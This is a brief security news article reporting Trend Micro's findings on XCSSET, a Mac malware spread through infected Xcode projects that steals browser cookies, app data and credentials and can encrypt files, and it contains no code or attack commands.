Security researchers have discovered a new mac malware dubbed XCSSET. The malware not only inserts malicious code into XCode projects, but also leverages two zero-days to exploit a flaw in Data Vaults and plant a JavaScript backdoor in Safari.
According to Trend Micro, the threat poses a risk to Xcode developers since they share their projects via GitHub. As a result, the malware infected code can lead to a “supply-chain” type attack against other users or organizations that rely on the code repositories.
“These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system,” Trend Micro explained in the blog post.
Trend Micro further describes the threat components that consist of a trojan “XCSSET” and a command and control (C2) related files.
To add, XCSSET performs the following malicious behavior according to the report:
- Launches Universal Cross-site Scripting (UXSS) attacks to plant JavaScript backdoor in Safari to inject JavaScript backdoors onto websites.
- Exploits a vulnerability to read and dump Safari cookies to steal user data.
- Steals information from the user’s Evernote, Notes, Skype, Telegram, QQ ,and WeChat apps.
- Takes screenshots of the victim’s current screen.
- Uploads files from the infected system to the attacker’s specified server.
- Encrypts files and shows a ransom note, if commanded by the server.
In addition, Trend Micro warned that XCSSET “is theoretically capable of modifying almost every part of the user’s browser experience as arbitrary JavaScript-injected code.”
For instance, the malware can steal credentials (e.g., PayPal, Apple ID), payment card data from the Apple Store, or modify cryptocurrency addresses, to name a few.
For more technical details, check out Trend Micro’s XCSSET technical brief.
Readers can also check out Trend Micro’s previous report on another Mac malware threat “ThiefQuest” known to also target macOS systems and is used to encrypt files and install keyloggers.